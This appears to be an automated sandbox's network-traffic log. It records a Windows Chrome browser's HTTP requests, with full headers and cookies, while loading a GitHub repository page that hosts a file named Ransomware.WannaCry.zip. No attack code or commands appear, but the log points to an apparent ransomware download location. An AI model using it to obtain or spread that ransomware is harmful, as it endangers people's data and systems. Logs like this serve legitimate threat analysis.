              Source: global trafficHTTP traffic detected: GET /assets/chunk-app_components_search_custom-scopes-element_ts-f5230254d82b.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_delegated-events_dist_in-f11236-50158068cc10.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/chunk-app_assets_modules_github_jump-to_ts-2641544048b8.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/chunk-app_assets_modules_github_onfocus_ts-app_assets_modules_github_visible_ts-app_components_sear-d461c8-a5ca34673a12.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/chunk-ui_packages_cookie-consent-element_cookie-consent-element_ts-6c210391e8f0.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0 HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: text/html, application/xhtml+xmlTurbo-Frame: repo-content-turbo-framesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-80fd8ee00406.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/ui_packages_query-builder-element_query-builder-element_ts-5fadb36426c7.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/chunk-ui_packages_trusted-types-policies_policy_ts-ui_packages_trusted-types_trusted-types_ts-node_-38f8f1-5c4d940a245a.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/refs?type=branch HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/latest-commit/master/Ransomware.WannaCry.zip HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: application/jsonX-Requested-With: XMLHttpRequestGitHub-Verified-Fetch: truesec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/deferred-metadata/master/Ransomware.WannaCry.zip HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: application/jsonX-Requested-With: XMLHttpRequestGitHub-Verified-Fetch: truesec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-57f9943adb92.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-7ef3071b711c.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /u/19915931?v=4&size=40 HTTP/1.1Host: avatars.githubusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/refs?type=branch HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurichIf-None-Match: W/"8472f0ac1bd0bdea4efec9eccc6c7961"
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/refs?type=branch HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/latest-commit/master/Ransomware.WannaCry.zip HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/deferred-metadata/master/Ransomware.WannaCry.zip HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /u/19915931?v=4&size=40 HTTP/1.1Host: avatars.githubusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/refs?type=branch HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurichIf-None-Match: W/"8472f0ac1bd0bdea4efec9eccc6c7961"
              Source: global trafficHTTP traffic detected: GET /favicons/favicon.svg HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /manifest.json HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/refs?type=branch HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /favicons/favicon.png HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicons/favicon.svg HTTP/1.1Host: github.githubassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0 HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /assets/apple-touch-icon-144x144-b882e354c005.png HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
